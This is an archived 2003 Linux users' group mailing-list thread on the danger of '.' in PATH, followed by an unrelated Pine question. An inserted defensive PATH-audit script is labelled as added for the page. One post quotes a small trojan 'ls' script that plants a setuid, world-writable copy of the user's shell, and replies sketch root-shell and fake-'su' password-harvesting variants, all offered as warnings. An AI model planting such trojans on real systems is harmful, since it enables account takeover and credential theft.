[LUGSB] A Windows user's habit is not healthy in Linux
Adam David Alan Martin
addmarti at ic.sunysb.edu
Tue Nov 25 16:21:40 EST 2003
Some points on this... just my 0.02USD, I guess.....
On Tue, 25 Nov 2003, Charles P Wright wrote:
> > > Some people also put "." in their path, but I personally think thats a bad
> > > idea.
> >
> > Why exactly?
> Let's say I drop something like (but untested):
>
> #!/bin/sh
>
> cp /bin/sh /tmp/.root-shells/sh-$UID >/dev/null 2>&1
> chmod 4777 /tmp/.root-shells/sh-$UID >/dev/null 2>&1
>
> exec /bin/ls $*
>
> Into a file named /tmp/ls. I could of course have it remove itself before
> execing the real ls, so that you don't see it.
>
> Now you cd /tmp, and type ls. If "." is in your path before "/bin", then
> I get a shell that executes as your user. I just run
> /tmp/.root-shells/sh-$UID to pretend I'm that user.
>
> > I've been told that it makes for some sort of security issue, but I
> > don't understand what the problem would be, especially if you put it at
> > the end of your path.
> The end is certainly better than the beginning.
>
> Chip
While I'm certainly inclined to agree with Chip, that the end
is better than the beginning, for placing the "." on a path,
I would certainly NOT recommend it. If you believe, for example,
that your system has properly installed a package, with an
executable file named "foo", and it really doesn't, the same thing
applies. All placing it at the end does is guarantee that if it's
a "system" installed binary, it gets run, instead of the one local
to wherever you are.
In an earlier post on this thread someone said that it wasn't as
big a problem for non-root users... I disagree:
It gets worse, too: Some commands are SUID root because they have to
be... Things like su, and such. Normally this isn't a problem, since
they ask you for your root password; however some do not. Accelerated
X11 servers are installed SUID root, such that they may access
/dev/mem, and /dev/ports. Dependent upon how your system is setup,
and how X is written (Which X server... XFree86, etc...), you can cause
severe security breaches, if X is configured to run other programmes.
I.e.: X will start, and try to fork and launch a windowmanager,
but another fork of X will do something, like start another acceleration
daemon. If X doesn't shed the user's path before trying to start that
acceleration daemon, and there is a file with "x" permission
in the cwd of the X server, you're in trouble. Using the simple
trick shown above by Chip, and substituting the name of the daemon
for "ls", someone can easily get a root shell on your system.
For this, and other reasons, I don't think typing:
./$EXECNAME
is too much trouble (Where $EXECNAME is the name of the executable you
wish to run, that is not in the path.)
While that example is a little bit far fetched, I know someone who
had his Solaris box rooted using a script called by his apache
server. I don't know the particulars of how the cracker
convinced httpd to run his script; but I suspect it had something to
do with the fact that the guy would run his CGI scripts
from their directories with "." in his path... (Could be
coincidence... but we'll never know... he wiped the whole system
to start again.)
Just because someone is not a ROOT user on your system doesn't
mean he or she may not be running possible programmes installed as root.
An afterthought, as well, on the password-asking ones, like su. A
user might leave a malicious script in a directory he has access to,
called "su" which does pass the password on to the real su(1)
but also will harvest it, and keep it for himself; kicking around.
I guess security is not something to be taken lightly, IMHO.
--
Adam Martin
From ezk at fsl.cs.sunysb.edu Tue Nov 25 16:32:24 2003
Date: Tue, 25 Nov 2003 16:32:33 -0500
Message-Id: <200311252132.hAPLWXwq018823 at agora.fsl.cs.sunysb.edu>
From: Erez Zadok <ezk at cs.sunysb.edu>
To: Linux Users Group at Stony Brook <lugsb at fsl.cs.sunysb.edu>
Subject: Re: [LUGSB] A Windows user's habit is not healthy in Linux
In-reply-to: Your message of "Tue, 25 Nov 2003 16:21:40 EST." <Pine.SOL.4.58.0311251557310.9187 at sparky.ic.sunysb.edu>
I never put "." in my path, not at the end either. Why? B/c of these
"programs": mroe, les, emcas, sl, lss, ls-l, cd-, and friends.
Erez.
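The two posts above make one point from two sides: Adam's, that even a trailing "." only wins when the name is missing from the system directories (an uninstalled "foo", or a daemon a SUID program tries to exec), and Erez's, that a typo like "mroe" is exactly such a missing name. The POSIX sh script below is an added example written for this page, not code from the thread or from any list member. It does two things: `unsafe_path_entries` reports every PATH entry that resolves relative to the current directory (".", "./x", a bare relative name, or an empty entry such as "::" or a trailing ":", which the shell also treats as cwd) or that sits in a world-writable directory, and `resolve_in_path` replays the shell's lookup so you can see which entry actually supplies a command name. The script name `path_audit.sh` and both function names are my own; the world-writable test uses `find -perm -0002`, which checks the permission bits rather than whether the caller can write.

```shell
#!/bin/sh
# path_audit.sh (added example; the name and the functions are assumptions,
# not anything from the list thread).
#
#   unsafe_path_entries PATHSTRING
#       prints one "<reason><TAB><entry>" line for each PATH entry that
#       resolves relative to the current directory or that anyone can
#       write into.
#   resolve_in_path NAME PATHSTRING
#       emulates the shell's command lookup over PATHSTRING and prints the
#       first executable file it finds (exit 1 if none).

unsafe_path_entries() {
    rest="$1:"                      # trailing ':' so the last entry is consumed too
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        case "$entry" in
            "")
                # An empty entry ("::", or a leading/trailing ':') means cwd,
                # exactly like "." but much easier to overlook.
                printf 'empty-entry-means-cwd\t(empty)\n' ;;
            .|./*)
                printf 'explicit-cwd\t%s\n' "$entry" ;;
            /*)
                # Absolute entry: only a problem if anyone can drop a file
                # into it. -perm -0002 tests the other-write bit (sticky or
                # not: a new "ls" can still be created there).
                if [ -d "$entry" ] && \
                   [ -n "$(find "$entry" -prune -perm -0002 2>/dev/null)" ]; then
                    printf 'world-writable\t%s\n' "$entry"
                fi ;;
            *)
                # Any other relative entry ("bin", "../tools") depends on cwd.
                printf 'relative-entry\t%s\n' "$entry" ;;
        esac
    done
}

resolve_in_path() {
    name="$1"
    rest="$2:"
    while [ -n "$rest" ]; do
        dir="${rest%%:*}"
        rest="${rest#*:}"
        [ -z "$dir" ] && dir=.     # empty entry is searched as cwd
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s/%s\n' "$dir" "$name"
            return 0
        fi
    done
    return 1
}

if [ "$#" -gt 0 ]; then
    # Usage: sh path_audit.sh "$PATH"   (audits the PATH string you pass in)
    unsafe_path_entries "$1"
fi
```

Run it against your own shell's value with `sh path_audit.sh "$PATH"`; an empty report is the goal. `resolve_in_path mroe "/usr/bin:."` from a directory containing an executable `mroe` shows why "end of path" is not a defence: nothing earlier matches, so the cwd copy is what runs, which is the case both posts describe.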
From dkhalily at ic.sunysb.edu Fri Nov 28 04:22:44 2003
Date: Fri, 28 Nov 2003 04:22:44 -0500 (EST)
From: Bookface <dkhalily at ic.sunysb.edu>
To: Linux Users Group at Stony Brook <lugsb at fsl.cs.sunysb.edu>
Subject: Re: [LUGSB] Pine question.
In-Reply-To: <Pine.GSO.4.44.0311251127230.19331-100000 at SunRa.mathlab.sunysb.edu>
Message-ID: <Pine.SOL.4.58.0311280417290.3112 at sparky.ic.sunysb.edu>
On Tue, 25 Nov 2003, Michael Graffam wrote:
> On Mon, 24 Nov 2003, Paul C Bors wrote:
>
> > How can you modify the from address in pine's configuration? I looked
> > for that option all over LoL
>
> It may require a re-compilation of Pine...
I don't know about all that. Here's how I did it in Pine on sparky: from
the main menu, go to [S]etup, [C]onfigure, and the first field is
"Personal-name" which you can set to whatever you like.
I assume that Pine would have the option to change this turned on by default,
because I doubt that sparky's administrators would take the trouble to
allow it if it wasn't.
I was under the impression that Pine wasn't "free as in free speech"
though and that's why Nano was created, because people weren't allowed
to use Pico separately?
Also,
On Tue, 25 Nov 2003, Erez Zadok wrote:
> I never put "." in my path, not at the end either. Why? B/c of these
> "programs": mroe, les, emcas, sl, lss, ls-l, cd-, and friends.
But I never make mistakes... ;-)
- Daniel Khalily
From mgraffam at mathlab.sunysb.edu Fri Nov 28 06:08:14 2003
Date: Fri, 28 Nov 2003 06:08:14 -0500 (EST)
From: Michael Graffam <mgraffam at mathlab.sunysb.edu>
To: Linux Users Group at Stony Brook <lugsb at fsl.cs.sunysb.edu>
Subject: Re: [LUGSB] Pine question.
In-Reply-To: <Pine.SOL.4.58.0311280417290.3112 at sparky.ic.sunysb.edu>
Message-ID: <Pine.GSO.4.44.0311280604240.3751-100000 at SunRa.mathlab.sunysb.edu>
On Fri, 28 Nov 2003, Bookface wrote:
> On Tue, 25 Nov 2003, Michael Graffam wrote:
> > It may require a re-compilation of Pine...
>
> I don't know about all that. Here's how I did it in Pine on sparky: from
> the main menu, go to [S]etup, [C]onfigure, and the first field is
> "Personal-name" which you can set to whatever you like.
Personal-name isn't the option in question.
> I assume that Pine would have the option to change this on by default,
> because I doubt that sparky's administrators would take the trouble to
> allow it if it wasn't.
You'd be surprised how easy it is to do ./configure --enable-changing-from
or whatever it is.
> I was under the impression that Pine wasn't "free as in free speech"
> though and that's why Nano was created, because people weren't allowed
> to use Pico separately?
No. Pine isn't free as in freedom because of the distribution license.